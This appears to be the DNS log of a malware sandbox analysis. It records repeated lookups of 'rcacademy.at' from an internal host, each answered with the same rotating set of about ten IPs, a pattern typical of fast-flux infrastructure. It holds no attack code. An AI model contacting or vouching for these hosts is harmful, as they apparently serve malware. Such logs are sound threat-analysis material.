                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET8.8.8.8192.168.2.60xcbf3No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET8.8.8.8192.168.2.60x1ec2No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET8.8.8.8192.168.2.60x276aNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET8.8.8.8192.168.2.60x102bNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET8.8.8.8192.168.2.60x7f6cNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET8.8.8.8192.168.2.60xfa41No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET8.8.8.8192.168.2.60x9738No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET8.8.8.8192.168.2.60xa49aNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET8.8.8.8192.168.2.60x7a75No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET8.8.8.8192.168.2.60x95b6No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET8.8.8.8192.168.2.60x87d9No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET8.8.8.8192.168.2.60x9913No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET8.8.8.8192.168.2.60xcf6bNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET8.8.8.8192.168.2.60x1edeNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET8.8.8.8192.168.2.60x31a1No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET8.8.8.8192.168.2.60x2929No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET8.8.8.8192.168.2.60x8613No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET8.8.8.8192.168.2.60xd139No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
